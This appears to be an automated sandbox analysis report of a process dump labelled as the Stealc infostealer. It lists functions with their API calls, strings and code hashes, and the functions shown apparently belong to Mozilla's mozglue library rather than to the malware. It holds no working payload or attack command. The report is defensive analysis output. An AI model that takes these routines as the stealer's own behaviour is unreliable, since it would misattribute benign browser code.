Function 6BFCBA90 Relevance: 1.8, Strings: 1, Instructions: 510COMMON

Download Yara Rule

Strings

, xrefs: 6BFCBBDA

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: bc2e7ba103dd9b74f8e23936845686a66016de4c457200dc7ad7bc1ad7d1f53f
Instruction ID: 7c25d11215a7528643880e25fa6e08eb05e2efa62cb8565a84f0c6bf500b1511
Opcode Fuzzy Hash: bc2e7ba103dd9b74f8e23936845686a66016de4c457200dc7ad7bc1ad7d1f53f
Instruction Fuzzy Hash: 1D02D477A0835B8BD704CE68C49076BB3E1EB85704F508D6DE995872A6D73C98C9CB83

Function 6BFCB170 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91023d4701978864ddbf8b1509b1d71a32ba5b53e5da3eb29e04bfa593dc3573
Instruction ID: 73719a930e1b7ea324bb9074e288ab36aa4292dca3db85244062af61a02fea6a
Opcode Fuzzy Hash: 91023d4701978864ddbf8b1509b1d71a32ba5b53e5da3eb29e04bfa593dc3573
Instruction Fuzzy Hash: 98B12977A0875B8BC701CE28C45139FB7E2AFC6754F058A59E8D4972B6D339C8858783

Function 6BF958E0 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: eb537774c4e430859b6e9ec60977542556c2697a951261ac5a361443fb7d43a0
Instruction ID: 04aa533082c5e60853f2ba0ad946f6ed83648c93ff52fa46232a13ef2d17ca2e
Opcode Fuzzy Hash: eb537774c4e430859b6e9ec60977542556c2697a951261ac5a361443fb7d43a0
Instruction Fuzzy Hash: 5A819C76E002199FDB08DFA8D8809EEFBF2FF89314F14426AD511AB351D735A945CBA0

Function 6BF6C370 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e83b0c5a3f747581d75247f8b70b38a542b99b8e519446b1d17fceb57193a3
Instruction ID: 68ed6cedde146696df23e86f5679ff6724cbe92eada0a7a75923a55a911cc89c
Opcode Fuzzy Hash: a1e83b0c5a3f747581d75247f8b70b38a542b99b8e519446b1d17fceb57193a3
Instruction Fuzzy Hash: BF4158337292C18EEF85C6784451BA63F9587A3314F1989BEC896C3263E56BC50CD322

Function 6BF619A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BFDF760), ref: 6BF619BD
GetCurrentProcess.KERNEL32 ref: 6BF619E5
GetLastError.KERNEL32 ref: 6BF61A27
moz_xmalloc.MOZGLUE(?), ref: 6BF61A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6BF61A4F
GetLastError.KERNEL32 ref: 6BF61A92
moz_xmalloc.MOZGLUE(?), ref: 6BF61AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6BF61ABA
LocalFree.KERNEL32(?), ref: 6BF61C69
free.MOZGLUE(?), ref: 6BF61C8F
free.MOZGLUE(?), ref: 6BF61C9D
CloseHandle.KERNEL32(?), ref: 6BF61CAE
ReleaseSRWLockExclusive.KERNEL32(6BFDF760), ref: 6BF61D52
GetLastError.KERNEL32 ref: 6BF61DA5
GetLastError.KERNEL32 ref: 6BF61DFB
GetLastError.KERNEL32 ref: 6BF61E49
GetLastError.KERNEL32 ref: 6BF61E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF61E9B

Part of subcall function 6BF62070: LoadLibraryW.KERNEL32(combase.dll,6BF61C5F), ref: 6BF620AE
Part of subcall function 6BF62070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6BF620CD
Part of subcall function 6BF62070: __Init_thread_footer.LIBCMT ref: 6BF620E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6BF61F15
VerSetConditionMask.NTDLL ref: 6BF61F46
VerSetConditionMask.NTDLL ref: 6BF61F52
VerSetConditionMask.NTDLL ref: 6BF61F59
VerSetConditionMask.NTDLL ref: 6BF61F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BF61F6D

Strings

D, xrefs: 6BF61B57

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: f18a37041fbc3a3eaf87268898c0bf68ad80361b73254ed91e3707c4aea935d0
Instruction ID: 36c498e454127effee622e19a6b8ee7e7b0dfd2b41c8553a64c1c2abe3f39d1f
Opcode Fuzzy Hash: f18a37041fbc3a3eaf87268898c0bf68ad80361b73254ed91e3707c4aea935d0
Instruction Fuzzy Hash: F7F18272D10225AFEB109F75CC48BAAB7B4FF49740F004599E905A7261E778EE94CFA0

Function 6BF7BB80 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 388stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(00000000,0000002E), ref: 6BF7BC5A
strchr.VCRUNTIME140(00000001,0000002E), ref: 6BF7BC6E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6BF7BC9E
memset.VCRUNTIME140(?,00000000,00000110), ref: 6BF7BE33
VerSetConditionMask.NTDLL ref: 6BF7BE65
VerSetConditionMask.NTDLL ref: 6BF7BE71
VerSetConditionMask.NTDLL ref: 6BF7BE7D
VerSetConditionMask.NTDLL ref: 6BF7BE89
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BF7BE97
memset.VCRUNTIME140(?,00000000,00000110), ref: 6BF7BEE4
VerSetConditionMask.NTDLL ref: 6BF7BF15
VerSetConditionMask.NTDLL ref: 6BF7BF21
VerSetConditionMask.NTDLL ref: 6BF7BF2D
VerSetConditionMask.NTDLL ref: 6BF7BF39
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BF7BF47

Part of subcall function 6BFBAAE0: GetCurrentThreadId.KERNEL32 ref: 6BFBAAF8
Part of subcall function 6BFBAAE0: EnterCriticalSection.KERNEL32(6BFDF770,?,6BF7BF9F), ref: 6BFBAB08
Part of subcall function 6BFBAAE0: LeaveCriticalSection.KERNEL32(6BFDF770,?,?,?,?,?,?,?,?,6BF7BF9F), ref: 6BFBAB6B

free.MOZGLUE(00000000), ref: 6BF7BFF0
_strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6BF7C014

Part of subcall function 6BFBAC20: CreateFileW.KERNEL32 ref: 6BFBAC52
Part of subcall function 6BFBAC20: CreateFileMappingW.KERNEL32 ref: 6BFBAC7D
Part of subcall function 6BFBAC20: GetSystemInfo.KERNEL32 ref: 6BFBAC98
Part of subcall function 6BFBAC20: MapViewOfFile.KERNEL32 ref: 6BFBACB0
Part of subcall function 6BFBAC20: GetSystemInfo.KERNEL32 ref: 6BFBACCD
Part of subcall function 6BFBAC20: MapViewOfFile.KERNEL32 ref: 6BFBAD05
Part of subcall function 6BFBAC20: UnmapViewOfFile.KERNEL32 ref: 6BFBAD1C
Part of subcall function 6BFBAC20: CloseHandle.KERNEL32 ref: 6BFBAD28
Part of subcall function 6BFBAC20: UnmapViewOfFile.KERNEL32 ref: 6BFBAD37
Part of subcall function 6BFBAC20: CloseHandle.KERNEL32 ref: 6BFBAD43

Part of subcall function 6BFBAE70: GetCurrentThreadId.KERNEL32 ref: 6BFBAE85
Part of subcall function 6BFBAE70: EnterCriticalSection.KERNEL32(6BFDF770,?,6BF7C034), ref: 6BFBAE96
Part of subcall function 6BFBAE70: LeaveCriticalSection.KERNEL32(6BFDF770,?,?,?,?,6BF7C034), ref: 6BFBAEBD

Strings

LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6BF7BFCF
LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6BF7BDDD
LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6BF7BF5B
accelerator.dll, xrefs: 6BF7BC8E, 6BF7BC9D

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
API String ID: 3889411031-3373514183
Opcode ID: a96beda1e348cb03bf1e83eccd919a1d7b51523ea544a6e72e25e9be530d9f4c
Instruction ID: eb8199d74defa91de9bde5930f4a4af9bc99210a3bd088e0ce2603feb47d836f
Opcode Fuzzy Hash: a96beda1e348cb03bf1e83eccd919a1d7b51523ea544a6e72e25e9be530d9f4c
Instruction Fuzzy Hash: DCE1D9739043019BD720AF38D855B9AB7E5EF86704F048DBEE885872A1DB78E944C792

Function 6BF9E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF97090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6BF9B9F1,?), ref: 6BF97107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BF9DCF5), ref: 6BF9E92D
GetCurrentThreadId.KERNEL32 ref: 6BF9EA4F
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9EA5C
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9EA80
GetCurrentThreadId.KERNEL32 ref: 6BF9EA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BF9DCF5), ref: 6BF9EA92
GetCurrentThreadId.KERNEL32 ref: 6BF9EB11
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BF9EB3C
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9EB5B

Part of subcall function 6BF95710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6BF9EB71), ref: 6BF957AB

Part of subcall function 6BF8CBE8: GetCurrentProcess.KERNEL32(?,6BF531A7), ref: 6BF8CBF1
Part of subcall function 6BF8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BF531A7), ref: 6BF8CBFA

Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BF64A68), ref: 6BF9945E
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BF99470
Part of subcall function 6BF99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BF99482
Part of subcall function 6BF99420: __Init_thread_footer.LIBCMT ref: 6BF9949F

GetCurrentThreadId.KERNEL32 ref: 6BF9EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BF9EBAC

Part of subcall function 6BF994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BF994EE
Part of subcall function 6BF994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BF99508

GetCurrentThreadId.KERNEL32 ref: 6BF9EBC1
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8,?,?,00000000), ref: 6BF9EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BF9EBE5
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8,00000000), ref: 6BF9EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BF9EC46
CloseHandle.KERNEL32(?), ref: 6BF9EC55
free.MOZGLUE(00000000), ref: 6BF9EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6BF9EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BF9EA9B

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: 409b6d082559ef99658985d5f57d7ace120cea5b928a78ff6de659281670a2ed
Instruction ID: a8af0a1bd81ab0018445d57e35d18d072605e29f6585569752d7b8d033973638
Opcode Fuzzy Hash: 409b6d082559ef99658985d5f57d7ace120cea5b928a78ff6de659281670a2ed
Instruction Fuzzy Hash: 0DA12432A10205CFEB54AF38E884B6A77A5FFC6314F14852DEA1987371DB79D848CB61

Function 6BF64180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6BF64196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BF641F1
VerSetConditionMask.NTDLL ref: 6BF64223
VerSetConditionMask.NTDLL ref: 6BF6422A
VerSetConditionMask.NTDLL ref: 6BF64231
VerSetConditionMask.NTDLL ref: 6BF64238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BF64245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BF64263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6BF6427A
FreeLibrary.KERNEL32(?), ref: 6BF64299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6BF642C4
VerSetConditionMask.NTDLL ref: 6BF642F6
VerSetConditionMask.NTDLL ref: 6BF64302
VerSetConditionMask.NTDLL ref: 6BF64309
VerSetConditionMask.NTDLL ref: 6BF64310
VerSetConditionMask.NTDLL ref: 6BF64317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6BF64324

Strings

SetProcessDpiAwareness, xrefs: 6BF64274
Shcore.dll, xrefs: 6BF6425E

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: e8f10e3989441a8cc121f33cf81888b1db4968e2c079e722f6283c53397d4f73
Instruction ID: adfcc1d2f3122d47abaa42488e89f38438d3b4d2dbac0997f1736ad080fe9e43
Opcode Fuzzy Hash: e8f10e3989441a8cc121f33cf81888b1db4968e2c079e722f6283c53397d4f73
Instruction Fuzzy Hash: 87511272A402116BEB106B748C19BAFB768EFC6B90F014918F905DB1E1EB78DD54CBA0

Function 6BF9FAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BF9FADC
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9FAE9
GetCurrentThreadId.KERNEL32 ref: 6BF9FB31
GetCurrentThreadId.KERNEL32 ref: 6BF9FB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BF9FBF6
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9FC50

Strings

[D %d/%d] profiler_unregister_thread: %s, xrefs: 6BF9FC94
[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6BF9FD15

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: 1df29eb3d729372a94f9a53c9d5cdaf34d21b82fcfaa9d69829fef5b4970d52a
Instruction ID: 3d85fd38611a4e21c45c037a041bec061a0f0460851c0738300e200ef3009232
Opcode Fuzzy Hash: 1df29eb3d729372a94f9a53c9d5cdaf34d21b82fcfaa9d69829fef5b4970d52a
Instruction Fuzzy Hash: DA71E2329046018FE750EF38E445B6AB7E1FF86704F05896EE95587372EB39E904CB92

Function 6BF53AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BFDE768,?,00003000,00000004), ref: 6BF53AC5
LeaveCriticalSection.KERNEL32(6BFDE768,?,00003000,00000004), ref: 6BF53AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6BF53AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6BF53B57
EnterCriticalSection.KERNEL32(6BFDE784), ref: 6BF53B81
LeaveCriticalSection.KERNEL32(6BFDE784), ref: 6BF53BA3
EnterCriticalSection.KERNEL32(6BFDE7B8), ref: 6BF53BAE
LeaveCriticalSection.KERNEL32(6BFDE7B8), ref: 6BF53C74
EnterCriticalSection.KERNEL32(6BFDE784), ref: 6BF53C8B
LeaveCriticalSection.KERNEL32(6BFDE784), ref: 6BF53C9F
LeaveCriticalSection.KERNEL32(6BFDE7B8), ref: 6BF53D5C
EnterCriticalSection.KERNEL32(6BFDE784), ref: 6BF53D67
LeaveCriticalSection.KERNEL32(6BFDE784), ref: 6BF53D8A

Part of subcall function 6BF90D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6BF53DEF), ref: 6BF90D71
Part of subcall function 6BF90D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6BF53DEF), ref: 6BF90D84

Strings

MOZ_CRASH(), xrefs: 6BF53DB2
: (malloc) Error in VirtualFree(), xrefs: 6BF53DCC
<jemalloc>, xrefs: 6BF53DC7

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: f70584c4893fde18919aef0df59e251230565c5850a636eed27617fc6d4c4aee
Instruction ID: 575fab1e436d601775bec5e62787d811a13e95393118cd6d756c2445f446f788
Opcode Fuzzy Hash: f70584c4893fde18919aef0df59e251230565c5850a636eed27617fc6d4c4aee
Instruction Fuzzy Hash: FA91AF73B102058BDF54CF7CC8C472AB7B2FBA5310B144568E9229B3A5D779E825CB91

Function 6BF611B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6BF61213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BF61285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6BF612B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6BF61327

Strings

TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6BF612AD
&, xrefs: 6BF6126B
MZx, xrefs: 6BF611E1
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6BF6131B
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6BF6120D

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: bd24326d97db2b286cffea7ed48ae1e31413707fe68fe9219042db9a29337f50
Instruction ID: 5e9fb22465ba83e905da27b444c54d446c5a8f90e19fe74345a82c44732d78d8
Opcode Fuzzy Hash: bd24326d97db2b286cffea7ed48ae1e31413707fe68fe9219042db9a29337f50
Instruction Fuzzy Hash: BD71C472E043298ADB109F74C8017DEB7F5BF45389F04169ED845E3260E7386B98CBA2

Function 6BF531C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6BF53217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6BF53236
FreeLibrary.KERNEL32 ref: 6BF5324B
__Init_thread_footer.LIBCMT ref: 6BF53260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6BF5327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BF5328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BF532AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BF532D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6BF532E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6BF532F7

